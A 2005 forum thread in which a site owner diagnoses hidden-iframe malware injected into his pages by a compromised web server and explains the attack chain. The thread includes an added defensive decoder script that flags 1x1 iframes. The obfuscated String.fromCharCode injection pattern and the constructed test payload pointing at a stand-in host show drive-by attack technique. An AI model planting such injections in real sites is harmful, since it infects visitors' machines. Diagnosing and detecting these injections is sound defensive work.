My website tries to access a trojan off of another site

Discussion in 'malware problems & news' started by JC2, Mar 7, 2005.

Thread Status:
Not open for further replies.
  1. JC2

    JC2 Registered Member

    Mar 7, 2005

    A couple days ago I started noticing some odd behavior with my website. At random times when I'd load a site page in my browser, I would see the following message in my browser's status bar:

    "transferring data from hxxp:// . . . GetAccess.class"

    Seconds after seeing that message, my AV software (avast 4.6 on-access scanner) reported that it found the following viruses:

    1. JS:ClassLoader-7
    2. JS:Exploit-Bytverify-11
    3. VBS:Malware[Gen]
    4. Win32: Trojano-477[Trj]

    It recommended that I abort the connection. After doing so, the browser's status bar read "Applet GetAccess notinited".

    At first I thought this might be a problem with my pc and not my website. I updated and ran my AV software, Spybot Search & Destroy, and AdAware, but didn't find anything. My pc doesn't exhibit any odd behavior otherwise. No other websites seem to bring about this problem.

    I also accessed my site with another pc and it too discovered the same problem. Its Norton AV software also caught the virus before it could infect the computer.

    Next I thought the problem might lie in my website files. I backed up the entire website and then deleted everything on the webserver --still no luck. If I just go to the URL of my site, which is now an empty directory, and hit reload enough times, it will eventually do the same thing (attempt to contact the foreign server and execute the trojan applet).

    Finally I tried contacting my webhost tech support and explained everything to them. I was told that it was my problem not theirs because this is a windows virus and their servers are linux. They said it was impossible for a linux server to spread a windows virus. It didn't seem to matter to them that the virus being executed is located on a foreign server. They are sure that their server is safe and secure.

    So I'm at a loss for what to do. I've tested everything I can think of and spent many hours trying to find a solution. Is there a better approach to solving this? Any advice is greatly appreciated.

    Thanks for your help.

    All the best,
    Last edited by a moderator: Mar 7, 2005
  2. Bubba

    Bubba Updates Team

    Apr 15, 2002
    Hey JC....Welcome Wilders

    I'm not sure this will help you any but we had a kind of similar thread back in December concerning that padonak scum bag site.

    This thread---> Padonak./fa/hta.php/object.cfm
  3. JC2

    JC2 Registered Member

    Mar 7, 2005
    Thanks Bubba! :D It's good to know that others have successfully dealt with this problem. One of the hardest things about this has been knowing what the problem actually is, so that I can find info on it.

    In the thread you pointed me to, Laurie included links to some info at that were particularly helpful. The pdf document there gives a detailed analysis of what's happening.

    Based on their information it appears that what I'm dealing with is a variant of the Xpire/SplitInfinity Exploit. It happens when hackers do the following:
    1. Through various exploits, they hack a linux server running apache.
    2. They use a variant of the SuckIt rootkit to dynamically inject javascript into the headers of random web pages that are sent from the web server to users' web browsers.
    3. The javascript creates a tiny IFRAME that is invisible to users. Its source is another website that the hackers use to install a bundle of malware onto users' PCs.

    Originally the websites that these iframes referenced were hxxp:// and hxxp:// Now they are also using hxxp://

    According to this article, the hacker team responsible calls itself HangUp, and they've been known to be working on a padonok project (a misspelling of the word 'podonok' which apparently means 'scum').

    I checked this against what happens on my own website and found that javascript is indeed being injected into random web page headers. In my case, the fact that it was creating an iframe was more concealed than in the original xpire/splitinfinity version. Instead of being written in plain text, it was hidden in unicode:

    document.write(String.fromCharCode([a long series of unicode numbers]))

    Sure enough, when I translated the values it read:
    "iframe height=1 width=1 src=hxxp://"

    Now that I've identified the problem, there remains the question of how the server was compromised and what to do about it. Unfortunately, it seems that this is out of my hands. I don't use the software (PHPBB through OpenSSL) that the hackers exploited to access the server, but maybe someone else on the shared server does. Also, the unwillingness of my webhost's tech support to look into this means I'll probably have to move webhosts.

    Well, thanks again for pointing me in the right direction. I've tried to include enough basic information here so that anyone else with this problem can understand what's going on in less time than it took me.
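
The decoding step described in the post above, as an added example that is not part of the original thread: it statically decodes `document.write(String.fromCharCode(...))` calls in saved copies of a page and flags any that produce a 1x1 iframe, scanning several fetches because the injection is intermittent. The function names, the sample HTML and the host `injected.example` are constructed placeholders.

```javascript
// Added example (Node.js). All sample data is constructed for illustration.
const CHARCODE_WRITE =
  /document\.write\(\s*String\.fromCharCode\(\s*([\d\s,]+?)\s*\)\s*\)/g;

// Decode every fromCharCode payload without executing any of the page's script.
function decodeCharCodeWrites(html) {
  const decoded = [];
  for (const m of html.matchAll(CHARCODE_WRITE)) {
    const codes = m[1].split(",").map((n) => parseInt(n.trim(), 10));
    // Skip malformed lists instead of guessing at their meaning.
    if (codes.some((c) => Number.isNaN(c) || c < 0 || c > 0xffff)) continue;
    decoded.push(String.fromCharCode(...codes));
  }
  return decoded;
}

// An iframe whose height and width are both 0 or 1 is invisible to the visitor.
function isHiddenIframe(markup) {
  if (!/\biframe\b/i.test(markup)) return false;
  const dim = (name) => {
    const m = markup.match(new RegExp(name + "\\s*=\\s*[\"']?(\\d+)", "i"));
    return m ? parseInt(m[1], 10) : null;
  };
  const h = dim("height");
  const w = dim("width");
  return h !== null && w !== null && h <= 1 && w <= 1;
}

function scanResponse(html) {
  return decodeCharCodeWrites(html).filter(isHiddenIframe);
}

// Only some responses carry the injected script, so scan every saved fetch
// of the same URL and report which ones were tampered with.
function scanSamples(responses) {
  return responses
    .map((html, i) => ({ sample: i, findings: scanResponse(html) }))
    .filter((r) => r.findings.length > 0);
}

// Constructed input: one clean response and one with an injected script.
const payload = "<iframe height=1 width=1 src=http://injected.example/></iframe>";
const encoded = Array.from(payload, (ch) => ch.charCodeAt(0)).join(",");
const clean = "<html><head><title>Home</title></head><body>hi</body></html>";
const injected = clean.replace("<head>",
  `<head><script>document.write(String.fromCharCode(${encoded}))</script>`);

console.log(scanSamples([clean, injected, clean]));
```

A finding on a page whose files on disk are clean points at the server rather than the site content, which matches what the post observed after emptying the directory.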

  4. Larpo

    Larpo Guest

    My site also seems to be affected by this virus. Do you have any idea how to plug the security breach... I'm losing users rapidly!!